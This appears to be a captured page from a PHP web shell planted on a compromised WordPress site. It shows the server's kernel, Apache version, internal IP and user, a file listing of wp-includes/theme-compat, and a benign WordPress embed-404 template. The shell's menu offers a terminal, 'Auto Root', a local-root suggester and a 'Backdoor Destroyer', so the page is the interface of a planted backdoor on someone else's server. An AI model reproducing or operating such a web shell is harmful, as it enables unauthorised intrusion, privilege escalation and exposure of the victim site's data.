Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
wp-includes /
theme-compat /
Delete
Unzip
Name
Size
Permission
Date
Action
comments.php
2.1
KB
-rw-r--r--
2023-08-08 20:49
embed-404.php
967
B
-rw-r--r--
2022-05-24 20:50
embed-content.php
3.4
KB
-rw-r--r--
2022-03-04 08:12
embed.php
481
B
-rw-r--r--
2020-03-20 05:36
footer-embed.php
438
B
-rw-r--r--
2020-03-20 05:36
footer.php
1.03
KB
-rw-r--r--
2023-08-08 20:49
header-embed.php
702
B
-rw-r--r--
2021-12-06 16:06
header.php
1.82
KB
-rw-r--r--
2026-07-03 02:00
sidebar.php
4.38
KB
-rw-r--r--
2024-04-02 20:54
Save
Rename
<?php /** * Contains the post embed content template part * * When a post is embedded in an iframe, this file is used to create the content template part * output if the active theme does not include an embed-404.php template. * * @package WordPress * @subpackage Theme_Compat * @since 4.5.0 */ ?> <div class="wp-embed"> <p class="wp-embed-heading"><?php _e( 'Oops! That embed cannot be found.' ); ?></p> <div class="wp-embed-excerpt"> <p> <?php printf( /* translators: %s: A link to the embedded site. */ __( 'It looks like nothing was found at this location. Maybe try visiting %s directly?' ), '<strong><a href="' . esc_url( home_url() ) . '">' . esc_html( get_bloginfo( 'name' ) ) . '</a></strong>' ); ?> </p> </div> <?php /** This filter is documented in wp-includes/theme-compat/embed-content.php */ do_action( 'embed_content' ); ?> <div class="wp-embed-footer"> <?php the_embed_site_title(); ?> </div> </div>